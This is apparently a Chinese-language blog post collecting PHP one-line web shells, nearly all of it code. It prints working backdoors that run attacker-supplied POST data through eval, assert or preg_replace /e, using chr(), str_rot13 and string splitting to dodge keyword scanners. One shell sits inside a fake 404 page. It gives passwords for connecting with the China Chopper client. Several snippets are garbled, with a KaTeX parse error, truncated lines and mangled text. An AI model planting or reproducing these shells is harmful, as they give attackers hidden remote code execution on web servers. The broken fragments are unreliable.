那些強悍的PHP一句話後門
強悍的PHP一句話後門
常用一:
<?php $a=range(1,200);$b=chr($a[96-1+1]).chr($a[114-1+1]).chr($a[114-1+1]).chr($a[100-1+1]).chr($a[113-1+1]).chr($a[115-1+1]); $b(${chr($a[94]).chr($a[79]).chr($a[78]).chr($a[82]).chr($a[83])}[chr($a[51])]); ?>所以連起來就是
assert(${_POST}[4]);
密碼就是4
常用二:
<?php ($b4dboy = $_POST['b4dboy']) && @preg_replace('/ad/e','@'.str_rot13('riny').'($b4dboy)', 'add'); ?>使用上跟原來的一句話沒有區別,可用常用的客戶端連線密碼b4dboy。
str_rot13(‘riny’)即編碼後的eval,完全避開了關鍵字,又不失效果。
這類後門讓網站、伺服器管理員很是頭疼經常要換著方法進行各種檢測而很多新出現的編寫技術用普通的檢測方法是沒法發現並處理的。今天我們細數一些有意思的PHP一句話木馬。
利用404頁面隱藏PHP小馬
Not Found
The requested URL was not found on this server.
<?php @preg_replace("/[pageerror]/e",$_POST['error'],"saft"); header('HTTP/1.1 404 Not Found'); ?>404頁面是網站常用的檔案一般建議好後很少有人會去對它進行檢查修改這時我們可以利用這一點進行隱藏後門。
無特徵隱藏PHP一句話
<?php session_start(); $_POST['code'] && $_SESSION['theCode'] = trim($_POST['code']); $_SESSION['theCode']&&preg_replace('\'a\'eis','e'.'v'.'a'.'l'.'(base64_decode($_SESSION[\'theCode\']))','a'); 將$_POST['code']的內容賦值給$_SESSION['theCode']然後執行$_SESSION['theCode']亮點是沒有特徵碼。用掃描工具來檢查程式碼的話是不會報警的達到目的了。 三個變形的一句話PHP木馬 第一個 <?php (在菜刀裡寫http://site/1.php?2=assert密碼是1
第二個
<?php $_=""; $_[+""]=''; $_="$_".""; $_=($_[+""]|"").($_[+""]|"").($_[+""]^""); ?> <?php ${'_'.$_}['_'](${'_'.$_}['__']);?>在菜刀裡寫http://site/2.php?_=assert&__=eval($_POST[‘pass’]) 密碼是pass。如果你用菜刀的附加資料的話更隱蔽或者用其它注射工具也可以因為是post提交的。
第三個
($b4dboy = KaTeX parse error: Expected 'EOF', got '&' at position 18: …OST['b4dboy']) &̲& @preg_replace…b4dboy)’, ‘add’);
str_rot13(‘riny’)即編碼後的eval完全避開了關鍵字又不失效果讓人吐血
最後列幾個高階的PHP一句話木馬後門
1、
$hh = “p”.“r”.“e”.“g”."_".“r”.“e”.“p”.“l”.“a”.“c”.“e”;
_POST[‘h’],“Access”);
//菜刀一句話
2、
_GET[‘xbid’];
include ($filename);
//危險的include函式直接編譯任何檔案為php格式執行
3、
$reg=“c”.“o”.“p”.“y”;
_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);
//重新命名任何檔案
4、
$gzid = “p”.“r”.“e”.“g”."_".“r”.“e”.“p”.“l”.“a”.“c”.“e”;
_POST[‘h’],“Access”);
//菜刀一句話
5、
include ($uid);
//gif插一句話
6、
典型一句話
程式後門程式碼
<?php eval_r($_POST[sb])?>程式程式碼
<?php @eval_r($_POST[sb])?>//容錯程式碼
程式程式碼
<?php assert($_POST[sb]);?>//使用lanker一句話客戶端的專家模式執行相關的php語句
程式程式碼
<?$_POST['sa']($_POST['sb']);?>程式程式碼
<?$_POST['sa']($_POST['sb'],$_POST['sc'])?>程式程式碼
<?php @preg_replace("/[email]/e",$_POST['h'],"error"); ?>//使用這個後,使用菜刀一句話客戶端在配置連線的時候在"配置"一欄輸入
程式程式碼
[email protected]_r($_POST1);
程式程式碼
//繞過<?限制的一句話
綜上這些PHP一句話後門可謂五臟俱全一不小心您肯定中招了。